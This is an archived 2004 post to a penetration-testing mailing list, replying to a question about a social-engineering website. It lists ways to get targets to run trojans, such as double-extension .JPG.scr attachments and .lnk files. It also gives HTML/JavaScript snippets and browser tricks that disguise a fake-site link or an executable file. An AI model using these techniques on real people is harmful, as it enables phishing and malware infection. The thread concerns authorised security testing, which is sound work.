Re: Social Engineering Website (URL obfuscation/hiding)
From: Martin Mačok (martin.macok_at_underground.cz)
Date: 01/10/04
- Previous message: Jerry Shenk: "Converting raw 802.11 (rfmon) capture file to standard libpcap"
- In reply to: Random Task: "Social Engineering Website"
- Next in thread: Otero, Hernan (EDS): "RE: Social Engineering Website"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 10 Jan 2004 08:59:16 +0100 To: pen-test@securityfocus.com
On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:
> As a last note, we'd need to get people to go there. Making it look
> legit would be good. (i.e. use the %00 IE exploit to make the URL
> look like it's internal and make the site look like their own) Any
> techniques or message styles you've used and had success with?
- send the trojan code in an email attachment with a good old
something.JPG.scr trick (if you can go to them, they don't have to
go to you)
- some content filters disallow .scr, so try .lnk also
- send a link to the trojan file, in typical MS Outlook environment,
they just have to click on it and select "Open"
- use unique URL/file for each target (so you can track downloads
and email forwards)
URL obfuscation/hiding:
<script language="JavaScript">
<!--
function changehref()
{
document.all("obj").href = "http://www.fakesite.com" ;
return 1 ;
}
//-->
</script>
[snip]
<a href="http://www.realsite.com/" id="obj"
onclick="changehref();">www.fakesite.com</a>
Similar trick:
<a href="http://www.realsite.com"
onmouseover="window.status=('http://www.fakesite.com/'); return
true;">www.fakesite.com</a>
Some more recent SCAM trick:
<a
href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">
www.fakesite.com</a>
Other MS IE trick (browser believes it's a HTML instead of EXE):
http://server/file.exe?.html
As you mention, MS IE's (and possibly some other browser's) %00 trick:
README.TXT%00PROG.EXE in Content-disposition:
(there are many different tricks with %00)
See also:
http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
http://www.solutions.fi/iebug2
--
Martin Mačok http://underground.cz/
martin.ma***@underground.cz http://Xtrmntr.org/ORBman/
---------------------------------------------------------------------------
----------------------------------------------------------------------------
- Previous message: Jerry Shenk: "Converting raw 802.11 (rfmon) capture file to standard libpcap"
- In reply to: Random Task: "Social Engineering Website"
- Next in thread: Otero, Hernan (EDS): "RE: Social Engineering Website"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
